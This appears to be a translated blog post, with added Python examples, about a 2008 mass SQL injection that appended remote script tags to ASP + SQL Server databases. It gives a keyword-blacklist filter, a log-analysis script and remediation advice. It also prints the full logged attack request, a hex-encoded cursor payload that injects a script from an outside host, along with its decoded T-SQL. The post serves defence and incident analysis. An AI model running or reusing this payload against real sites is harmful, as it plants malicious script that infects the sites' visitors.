Some time ago, data in a few tables of one of the company's main web sites kept being modified and "hung with a horse" (a web trojan script appended to the data). The site had been written by someone else and the code was a bit messy, so I could only look at the code in the files that touched those tables. My guess was that dangerous characters were not being filtered when parameters were received, so I added filtering to the parameter-handling Format function, and in the database connection file replaced any ";" in incoming parameters with a different character. A day later the horse was back; the semicolon substitution had not helped.
Searching around, I found many examples since March of databases being hung with a horse through SQL injection, so this method seems to be popular at the moment. It targets only ASP + SQL Server sites, and only sites whose code has a SQL injection hole can be hit. It only touches text-type fields (char, text and the like); the appended data is usually a reference to js, 1.js, b.js or similar, and the host serving the script changes often.
With no better option, I looked for a way to block SQL injection, found the following code online, and added it to the database connection file:
<%
Response.Buffer = True
Const EnableStopInjection = True

If EnableStopInjection = True Then
    If Request.QueryString <> "" Then Call StopInjection(Request.QueryString)
    If Request.Cookies <> "" Then Call StopInjection(Request.Cookies)
    If Request.Form <> "" Then Call StopInjection(Request.Form)
End If

' Ends the request if any value in the collection contains a SQL
' metacharacter (' ; #) or a blacklisted keyword preceded by whitespace,
' '+' or a parenthesis. Inside [...] the \b is a backspace, not a word
' boundary, so keywords are matched as substrings (see the note below).
Sub StopInjection(Values)
    Dim regEx, sItem, sValue
    Set regEx = New RegExp
    regEx.IgnoreCase = True
    regEx.Global = True
    regEx.Pattern = "'|;|#|([\s\b+()]+(select|update|insert|delete|declare|@|exec|dbcc|alter|drop|create|backup|if|else|end|and|or|add|set|open|close|use|begin|return|as|go|exists)[\s\b+]*)"
    For Each sItem In Values
        sValue = Values(sItem)
        If regEx.Test(sValue) Then
            Response.Write "SQL injection risk detected, please confirm the information you submitted."
            Response.End
        End If
    Next
    Set regEx = Nothing
End Sub
%>
Note: adjust the values in regEx.Pattern to your own needs. If the pattern is set badly, ordinary submitted text will also trigger the SQL injection prompt. This is a keyword blacklist and a stopgap: it blocks the requests seen here, but it does not remove the injection point in the page code.
After this code was added, the site was not hung with a horse again.
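The note above about "improper settings" is easy to see with the pattern in hand. The following is an added example, not code from the original post: a Python port of the StopInjection regex run over constructed inputs. It shows that a request shaped like the logged attack is caught (the ";" alone is enough) and that the keyword list, having no word-boundary anchor, also rejects ordinary text such as "my android phone". The TIGHTENED pattern, ATTACK_QS and BENIGN_VALUES are my additions, not the page's.

```python
import re
from urllib.parse import unquote_plus

# Pattern copied from the ASP StopInjection routine. Python's re treats \b
# inside [...] as a backspace character, just as the VBScript RegExp object does.
STOP_INJECTION = re.compile(
    r"'|;|#|([\s\b+()]+(select|update|insert|delete|declare|@|exec|dbcc|alter"
    r"|drop|create|backup|if|else|end|and|or|add|set|open|close|use|begin"
    r"|return|as|go|exists)[\s\b+]*)",
    re.IGNORECASE,
)

# Suggested tightening (not the page's code): every keyword must end at a word
# boundary, so a keyword buried inside a longer word no longer matches.
TIGHTENED = re.compile(
    r"'|;|#|[\s\b+()]+(?:@|(?:select|update|insert|delete|declare|exec|dbcc|alter"
    r"|drop|create|backup|if|else|end|and|or|add|set|open|close|use|begin"
    r"|return|as|go|exists)\b)",
    re.IGNORECASE,
)


def would_reject(value: str, pattern: re.Pattern = STOP_INJECTION) -> bool:
    """True if the routine would Response.End on this (already URL-decoded) value."""
    return pattern.search(value) is not None


def check_query_string(qs: str, pattern: re.Pattern = STOP_INJECTION) -> dict:
    """Mimic the For Each loop over Request.QueryString: decode each value, test it."""
    verdicts = {}
    for pair in qs.split("&"):
        key, _, raw = pair.partition("=")
        verdicts[unquote_plus(key)] = would_reject(unquote_plus(raw), pattern)
    return verdicts


# Constructed query string with the shape of the logged attack; the hex literal
# is shortened to a few bytes because only the surrounding syntax matters here.
ATTACK_QS = ("Id=90;declare%20@s%20varchar(4000);Set%20@s=cast(0x4445434c"
             "%20as%20varchar(4000));EXEC(@S);--")

# Constructed ordinary form values a user might legitimately submit.
BENIGN_VALUES = ["my android phone", "O'Reilly", "C# developer",
                 "Paris, France", "please open the door"]


def compare_patterns(values):
    """For each value: (rejected by the page's pattern, rejected by the tightened one)."""
    return {v: (would_reject(v), would_reject(v, TIGHTENED)) for v in values}


if __name__ == "__main__":
    print("attack query:", check_query_string(ATTACK_QS))
    for value, (orig, tight) in compare_patterns(BENIGN_VALUES).items():
        print(f"{value!r:24} original={orig!s:5} tightened={tight}")
```

Adding the word boundary only removes the substring false positives; "please open the door" is still rejected because "open" is on the list, and "O'Reilly" because of the apostrophe. That is the limit of any keyword blacklist, which is why the filter is a stopgap and fixing the page code is the real remedy.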
A few days ago I got the IIS log from the hosting provider and could see the exact URL and method used for the SQL injection:
2008-06-23 16:01:31 GET /xxx.asp Id=90;declare%20@s%20varchar(4000);Set%20@s=cast(0x4445434c415245204054205641524348415228323535292c404320564152434841522832353529204445434c415245205461626c655f437572736f7220435552534f5220464f522053454c45435420612e6e616d652c622e6e616d652046524f4d207379736f626a6563747320612c737973636f6c756d6e73206220574845524520612e69643d622e696420414e4420612e78747970653d27752720414e442028622e78747970653d3939204f5220622e78747970653d3335204f5220622e78747970653d323331204f5220622e78747970653d31363729204f50454e205461626c655f437572736f72204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c4528404046455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275d20534554205b272b40432b275d3d525452494d28434f4e56455254285641524348415228343030302 92c5b272b40432b275d29292b27273c736372697074207372633d687474703a2f2f7777772e616477626e722e636f6d2f622e6a733e3c2f7363726970743e27272729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736F7220%20as%20varchar(4000));EXEC(@S);-- 201.8.166.17 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727) - www.xxx.com 200 0 271 1432 406
The hex-encoded middle part decodes to the following T-SQL:
DECLARE @T VARCHAR(255), @C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
    SELECT a.name, b.name
    FROM sysobjects a, syscolumns b
    WHERE a.id = b.id
      AND a.xtype = 'u'                                                    -- user tables only
      AND (b.xtype = 99 OR b.xtype = 35 OR b.xtype = 231 OR b.xtype = 167)  -- ntext, text, nvarchar, varchar columns
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T, @C
WHILE (@@FETCH_STATUS = 0)
BEGIN
    -- append the "hang horse" script tag to every row of every text column
    EXEC('UPDATE [' + @T + '] SET [' + @C + '] = RTRIM(CONVERT(VARCHAR(4000), [' + @C + '])) + ''<script src=...></script>''')
    FETCH NEXT FROM Table_Cursor INTO @T, @C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
This SQL injection came every few minutes from constantly changing IP addresses, so its real source could not be found. You can see how despicable these people are.
If your site's IIS log is large, consider the "IIS Web Log Import Analysis tool" that Chxwei wrote a few days ago to help you query and analyse it.
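As an added example (not part of the original post, and not the tool mentioned above), here is a short Python script that does the log analysis by hand: it parses W3C-format IIS log lines, URL-decodes the query string, finds CAST(0x... AS VARCHAR) literals, decodes the hex back to T-SQL and pulls out the script URL the payload appends. The log lines, IP addresses and the example.invalid script host are constructed; the payload text mirrors the decoded statement above.

```python
import re
from urllib.parse import unquote_plus

# Reconstruction of the decoded cursor payload shown above, with the real
# script host replaced by the placeholder example.invalid (constructed).
PAYLOAD_SQL = (
    "DECLARE @T VARCHAR(255),@C VARCHAR(255) "
    "DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b "
    "WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) "
    "OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C "
    "WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+@T+'] SET ['+@C+']="
    "RTRIM(CONVERT(VARCHAR(4000),['+@C+']))+''<script src=http://example.invalid/b.js></script>''') "
    "FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor"
)


def build_sample_log() -> str:
    """Constructed W3C-format IIS log (not the author's real log): one normal
    request, one request carrying the hex-encoded payload, one normal request."""
    hex_payload = PAYLOAD_SQL.encode("latin-1").hex()
    attack_query = ("Id=90;declare%20@s%20varchar(4000);Set%20@s=cast(0x" + hex_payload
                    + "%20as%20varchar(4000));EXEC(@S);--")
    ua = "Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1)"
    return "\n".join([
        "#Software: Microsoft Internet Information Services 6.0",
        "#Version: 1.0",
        "#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip cs(User-Agent) cs(Referer) cs-host sc-status",
        f"2008-06-23 16:00:02 GET /xxx.asp Id=90 10.0.0.5 {ua} - www.xxx.com 200",
        f"2008-06-23 16:01:31 GET /xxx.asp {attack_query} 198.51.100.17 {ua} - www.xxx.com 200",
        f"2008-06-23 16:02:10 GET /news.asp id=12 10.0.0.9 {ua} - www.xxx.com 200",
    ])


def parse_w3c(log_text: str) -> list:
    """Split a W3C extended log into dicts keyed by the names on the #Fields line."""
    fields, rows = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#"):
            rows.append(dict(zip(fields, line.split(" "))))
    return rows


# cast(0x<hex> as varchar/nvarchar/char ...): the encoding that hides the
# UPDATE statement from keyword filters while the request is in flight.
CAST_HEX = re.compile(r"cast\(\s*0x(?P<hex>[0-9a-f]+)\s+as\s+(?P<n>n?)(?:var)?char",
                      re.IGNORECASE)


def decode_cast_payloads(decoded_query: str) -> list:
    """Decode every hex CAST literal in a URL-decoded query string back to text."""
    payloads = []
    for m in CAST_HEX.finditer(decoded_query):
        digits = m.group("hex")
        if len(digits) % 2:  # odd length: truncated log line, nothing sensible to decode
            continue
        raw = bytes.fromhex(digits)
        # NVARCHAR literals are UTF-16LE; VARCHAR is one byte per character.
        encoding = "utf-16-le" if m.group("n") else "latin-1"
        payloads.append(raw.decode(encoding, errors="replace"))
    return payloads


def injected_script_urls(sql: str) -> list:
    """Pull the src of every <script> tag the payload appends (quotes optional)."""
    return re.findall(r"<script\s+src=['\"]?([^'\">\s]+)", sql, re.IGNORECASE)


def find_injections(log_text: str) -> list:
    """One record per request whose query string carries a hex CAST payload."""
    hits = []
    for row in parse_w3c(log_text):
        query = unquote_plus(row.get("cs-uri-query", ""))
        for sql in decode_cast_payloads(query):
            hits.append({
                "time": f"{row['date']} {row['time']}",
                "ip": row.get("c-ip", "-"),
                "page": row.get("cs-uri-stem", "-"),
                "sql": sql,
                "script_urls": injected_script_urls(sql),
            })
    return hits


if __name__ == "__main__":
    for hit in find_injections(build_sample_log()):
        print(hit["time"], hit["ip"], hit["page"])
        print("  appends:", hit["script_urls"])
        print("  decoded:", hit["sql"][:80], "...")
```

The "page" field of each hit is what step 1 of the summary below asks for: the ASP file whose parameter handling must be fixed. The decoded URL list is what you search the text columns for when cleaning the data.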
Finally, to sum up: if your database is modified and hung with a horse:
1. First look at the IIS log to find which page is being injected, then fix the code of those pages to prevent SQL injection: replace string-concatenated SQL with parameterized queries and check that numeric parameters such as Id really are numbers before they reach the database.
2. If you have no IIS log and cannot find the pages being exploited, use the code above in the database connection file as a stopgap.
Wherever SQL injection occurs there is a hole in the site code, so cleaning up the code is the real focus.
Source: http://www.chxwei.com/article.asp?id=359